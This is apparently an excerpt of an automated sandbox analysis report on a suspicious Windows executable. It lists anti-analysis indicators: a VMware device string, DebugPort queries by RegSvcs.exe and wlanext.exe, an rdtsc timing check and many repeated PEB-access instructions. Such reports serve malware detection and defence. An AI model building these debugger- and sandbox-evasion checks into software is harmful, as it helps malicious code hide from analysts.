Source: explorer.exe, 00000004.00000000.341318764.000000000095C000.00000004.00000020.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G

Source: C:\Users\user\Desktop\00098765123POIIU.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 3_2_004088A0 rdtsc

3_2_004088A0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 3_2_00409B10 LdrLoadDll,

3_2_00409B10

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FA58EC mov eax, dword ptr fs:[00000030h]	3_2_00FA58EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FA40E1 mov eax, dword ptr fs:[00000030h]	3_2_00FA40E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FA40E1 mov eax, dword ptr fs:[00000030h]	3_2_00FA40E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FA40E1 mov eax, dword ptr fs:[00000030h]	3_2_00FA40E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FDF0BF mov ecx, dword ptr fs:[00000030h]	3_2_00FDF0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FDF0BF mov eax, dword ptr fs:[00000030h]	3_2_00FDF0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FDF0BF mov eax, dword ptr fs:[00000030h]	3_2_00FDF0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FE90AF mov eax, dword ptr fs:[00000030h]	3_2_00FE90AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FD20A0 mov eax, dword ptr fs:[00000030h]	3_2_00FD20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FD20A0 mov eax, dword ptr fs:[00000030h]	3_2_00FD20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FD20A0 mov eax, dword ptr fs:[00000030h]	3_2_00FD20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FD20A0 mov eax, dword ptr fs:[00000030h]	3_2_00FD20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FD20A0 mov eax, dword ptr fs:[00000030h]	3_2_00FD20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FD20A0 mov eax, dword ptr fs:[00000030h]	3_2_00FD20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FA9080 mov eax, dword ptr fs:[00000030h]	3_2_00FA9080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_010649A4 mov eax, dword ptr fs:[00000030h]	3_2_010649A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_010649A4 mov eax, dword ptr fs:[00000030h]	3_2_010649A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_010649A4 mov eax, dword ptr fs:[00000030h]	3_2_010649A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_010649A4 mov eax, dword ptr fs:[00000030h]	3_2_010649A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_010269A6 mov eax, dword ptr fs:[00000030h]	3_2_010269A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FC0050 mov eax, dword ptr fs:[00000030h]	3_2_00FC0050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FC0050 mov eax, dword ptr fs:[00000030h]	3_2_00FC0050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_010251BE mov eax, dword ptr fs:[00000030h]	3_2_010251BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_010251BE mov eax, dword ptr fs:[00000030h]	3_2_010251BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_010251BE mov eax, dword ptr fs:[00000030h]	3_2_010251BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_010251BE mov eax, dword ptr fs:[00000030h]	3_2_010251BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FD002D mov eax, dword ptr fs:[00000030h]	3_2_00FD002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FD002D mov eax, dword ptr fs:[00000030h]	3_2_00FD002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FD002D mov eax, dword ptr fs:[00000030h]	3_2_00FD002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FD002D mov eax, dword ptr fs:[00000030h]	3_2_00FD002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FD002D mov eax, dword ptr fs:[00000030h]	3_2_00FD002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FBB02A mov eax, dword ptr fs:[00000030h]	3_2_00FBB02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FBB02A mov eax, dword ptr fs:[00000030h]	3_2_00FBB02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FBB02A mov eax, dword ptr fs:[00000030h]	3_2_00FBB02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FBB02A mov eax, dword ptr fs:[00000030h]	3_2_00FBB02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_010341E8 mov eax, dword ptr fs:[00000030h]	3_2_010341E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_01074015 mov eax, dword ptr fs:[00000030h]	3_2_01074015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_01074015 mov eax, dword ptr fs:[00000030h]	3_2_01074015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_01027016 mov eax, dword ptr fs:[00000030h]	3_2_01027016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_01027016 mov eax, dword ptr fs:[00000030h]	3_2_01027016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_01027016 mov eax, dword ptr fs:[00000030h]	3_2_01027016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FAB1E1 mov eax, dword ptr fs:[00000030h]	3_2_00FAB1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FAB1E1 mov eax, dword ptr fs:[00000030h]	3_2_00FAB1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FAB1E1 mov eax, dword ptr fs:[00000030h]	3_2_00FAB1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FD61A0 mov eax, dword ptr fs:[00000030h]	3_2_00FD61A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FD61A0 mov eax, dword ptr fs:[00000030h]	3_2_00FD61A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FD2990 mov eax, dword ptr fs:[00000030h]	3_2_00FD2990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_01071074 mov eax, dword ptr fs:[00000030h]	3_2_01071074
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_01062073 mov eax, dword ptr fs:[00000030h]	3_2_01062073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FDA185 mov eax, dword ptr fs:[00000030h]	3_2_00FDA185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FCC182 mov eax, dword ptr fs:[00000030h]	3_2_00FCC182
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_01023884 mov eax, dword ptr fs:[00000030h]	3_2_01023884
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_01023884 mov eax, dword ptr fs:[00000030h]	3_2_01023884
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FAB171 mov eax, dword ptr fs:[00000030h]	3_2_00FAB171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FAB171 mov eax, dword ptr fs:[00000030h]	3_2_00FAB171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FAC962 mov eax, dword ptr fs:[00000030h]	3_2_00FAC962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FCB944 mov eax, dword ptr fs:[00000030h]	3_2_00FCB944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FCB944 mov eax, dword ptr fs:[00000030h]	3_2_00FCB944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FD513A mov eax, dword ptr fs:[00000030h]	3_2_00FD513A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FD513A mov eax, dword ptr fs:[00000030h]	3_2_00FD513A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0103B8D0 mov eax, dword ptr fs:[00000030h]	3_2_0103B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0103B8D0 mov ecx, dword ptr fs:[00000030h]	3_2_0103B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0103B8D0 mov eax, dword ptr fs:[00000030h]	3_2_0103B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0103B8D0 mov eax, dword ptr fs:[00000030h]	3_2_0103B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0103B8D0 mov eax, dword ptr fs:[00000030h]	3_2_0103B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0103B8D0 mov eax, dword ptr fs:[00000030h]	3_2_0103B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FC4120 mov eax, dword ptr fs:[00000030h]	3_2_00FC4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FC4120 mov eax, dword ptr fs:[00000030h]	3_2_00FC4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FC4120 mov eax, dword ptr fs:[00000030h]	3_2_00FC4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FC4120 mov eax, dword ptr fs:[00000030h]	3_2_00FC4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FC4120 mov ecx, dword ptr fs:[00000030h]	3_2_00FC4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FA9100 mov eax, dword ptr fs:[00000030h]	3_2_00FA9100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FA9100 mov eax, dword ptr fs:[00000030h]	3_2_00FA9100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FA9100 mov eax, dword ptr fs:[00000030h]	3_2_00FA9100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FD2AE4 mov eax, dword ptr fs:[00000030h]	3_2_00FD2AE4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0106131B mov eax, dword ptr fs:[00000030h]	3_2_0106131B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FD2ACB mov eax, dword ptr fs:[00000030h]	3_2_00FD2ACB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FBAAB0 mov eax, dword ptr fs:[00000030h]	3_2_00FBAAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FBAAB0 mov eax, dword ptr fs:[00000030h]	3_2_00FBAAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FDFAB0 mov eax, dword ptr fs:[00000030h]	3_2_00FDFAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_01078B58 mov eax, dword ptr fs:[00000030h]	3_2_01078B58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FA52A5 mov eax, dword ptr fs:[00000030h]	3_2_00FA52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FA52A5 mov eax, dword ptr fs:[00000030h]	3_2_00FA52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FA52A5 mov eax, dword ptr fs:[00000030h]	3_2_00FA52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FA52A5 mov eax, dword ptr fs:[00000030h]	3_2_00FA52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FA52A5 mov eax, dword ptr fs:[00000030h]	3_2_00FA52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FDD294 mov eax, dword ptr fs:[00000030h]	3_2_00FDD294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FDD294 mov eax, dword ptr fs:[00000030h]	3_2_00FDD294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FE927A mov eax, dword ptr fs:[00000030h]	3_2_00FE927A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0105D380 mov ecx, dword ptr fs:[00000030h]	3_2_0105D380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0106138A mov eax, dword ptr fs:[00000030h]	3_2_0106138A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_01075BA5 mov eax, dword ptr fs:[00000030h]	3_2_01075BA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FA9240 mov eax, dword ptr fs:[00000030h]	3_2_00FA9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FA9240 mov eax, dword ptr fs:[00000030h]	3_2_00FA9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FA9240 mov eax, dword ptr fs:[00000030h]	3_2_00FA9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FA9240 mov eax, dword ptr fs:[00000030h]	3_2_00FA9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_010253CA mov eax, dword ptr fs:[00000030h]	3_2_010253CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_010253CA mov eax, dword ptr fs:[00000030h]	3_2_010253CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FE4A2C mov eax, dword ptr fs:[00000030h]	3_2_00FE4A2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FE4A2C mov eax, dword ptr fs:[00000030h]	3_2_00FE4A2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FC3A1C mov eax, dword ptr fs:[00000030h]	3_2_00FC3A1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FA5210 mov eax, dword ptr fs:[00000030h]	3_2_00FA5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FA5210 mov ecx, dword ptr fs:[00000030h]	3_2_00FA5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FA5210 mov eax, dword ptr fs:[00000030h]	3_2_00FA5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FA5210 mov eax, dword ptr fs:[00000030h]	3_2_00FA5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FAAA16 mov eax, dword ptr fs:[00000030h]	3_2_00FAAA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FAAA16 mov eax, dword ptr fs:[00000030h]	3_2_00FAAA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FB8A0A mov eax, dword ptr fs:[00000030h]	3_2_00FB8A0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0106AA16 mov eax, dword ptr fs:[00000030h]	3_2_0106AA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0106AA16 mov eax, dword ptr fs:[00000030h]	3_2_0106AA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FCDBE9 mov eax, dword ptr fs:[00000030h]	3_2_00FCDBE9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FD03E2 mov eax, dword ptr fs:[00000030h]	3_2_00FD03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FD03E2 mov eax, dword ptr fs:[00000030h]	3_2_00FD03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FD03E2 mov eax, dword ptr fs:[00000030h]	3_2_00FD03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FD03E2 mov eax, dword ptr fs:[00000030h]	3_2_00FD03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FD03E2 mov eax, dword ptr fs:[00000030h]	3_2_00FD03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FD03E2 mov eax, dword ptr fs:[00000030h]	3_2_00FD03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FD4BAD mov eax, dword ptr fs:[00000030h]	3_2_00FD4BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FD4BAD mov eax, dword ptr fs:[00000030h]	3_2_00FD4BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FD4BAD mov eax, dword ptr fs:[00000030h]	3_2_00FD4BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0106EA55 mov eax, dword ptr fs:[00000030h]	3_2_0106EA55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_01034257 mov eax, dword ptr fs:[00000030h]	3_2_01034257
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0105B260 mov eax, dword ptr fs:[00000030h]	3_2_0105B260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0105B260 mov eax, dword ptr fs:[00000030h]	3_2_0105B260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_01078A62 mov eax, dword ptr fs:[00000030h]	3_2_01078A62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FD2397 mov eax, dword ptr fs:[00000030h]	3_2_00FD2397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FDB390 mov eax, dword ptr fs:[00000030h]	3_2_00FDB390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FB1B8F mov eax, dword ptr fs:[00000030h]	3_2_00FB1B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FB1B8F mov eax, dword ptr fs:[00000030h]	3_2_00FB1B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FD3B7A mov eax, dword ptr fs:[00000030h]	3_2_00FD3B7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FD3B7A mov eax, dword ptr fs:[00000030h]	3_2_00FD3B7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FADB60 mov ecx, dword ptr fs:[00000030h]	3_2_00FADB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FAF358 mov eax, dword ptr fs:[00000030h]	3_2_00FAF358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FADB40 mov eax, dword ptr fs:[00000030h]	3_2_00FADB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_01078D34 mov eax, dword ptr fs:[00000030h]	3_2_01078D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0102A537 mov eax, dword ptr fs:[00000030h]	3_2_0102A537
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0106E539 mov eax, dword ptr fs:[00000030h]	3_2_0106E539
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_01023540 mov eax, dword ptr fs:[00000030h]	3_2_01023540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_01053D40 mov eax, dword ptr fs:[00000030h]	3_2_01053D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FB849B mov eax, dword ptr fs:[00000030h]	3_2_00FB849B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FC746D mov eax, dword ptr fs:[00000030h]	3_2_00FC746D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_010705AC mov eax, dword ptr fs:[00000030h]	3_2_010705AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_010705AC mov eax, dword ptr fs:[00000030h]	3_2_010705AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FDA44B mov eax, dword ptr fs:[00000030h]	3_2_00FDA44B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_01026DC9 mov eax, dword ptr fs:[00000030h]	3_2_01026DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_01026DC9 mov eax, dword ptr fs:[00000030h]	3_2_01026DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_01026DC9 mov eax, dword ptr fs:[00000030h]	3_2_01026DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_01026DC9 mov ecx, dword ptr fs:[00000030h]	3_2_01026DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_01026DC9 mov eax, dword ptr fs:[00000030h]	3_2_01026DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_01026DC9 mov eax, dword ptr fs:[00000030h]	3_2_01026DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FDBC2C mov eax, dword ptr fs:[00000030h]	3_2_00FDBC2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0106FDE2 mov eax, dword ptr fs:[00000030h]	3_2_0106FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0106FDE2 mov eax, dword ptr fs:[00000030h]	3_2_0106FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0106FDE2 mov eax, dword ptr fs:[00000030h]	3_2_0106FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0106FDE2 mov eax, dword ptr fs:[00000030h]	3_2_0106FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_01058DF1 mov eax, dword ptr fs:[00000030h]	3_2_01058DF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_01061C06 mov eax, dword ptr fs:[00000030h]	3_2_01061C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_01061C06 mov eax, dword ptr fs:[00000030h]	3_2_01061C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_01061C06 mov eax, dword ptr fs:[00000030h]	3_2_01061C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_01061C06 mov eax, dword ptr fs:[00000030h]	3_2_01061C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_01061C06 mov eax, dword ptr fs:[00000030h]	3_2_01061C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_01061C06 mov eax, dword ptr fs:[00000030h]	3_2_01061C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_01061C06 mov eax, dword ptr fs:[00000030h]	3_2_01061C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_01061C06 mov eax, dword ptr fs:[00000030h]	3_2_01061C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_01061C06 mov eax, dword ptr fs:[00000030h]	3_2_01061C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_01061C06 mov eax, dword ptr fs:[00000030h]	3_2_01061C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_01061C06 mov eax, dword ptr fs:[00000030h]	3_2_01061C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_01061C06 mov eax, dword ptr fs:[00000030h]	3_2_01061C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_01061C06 mov eax, dword ptr fs:[00000030h]	3_2_01061C06
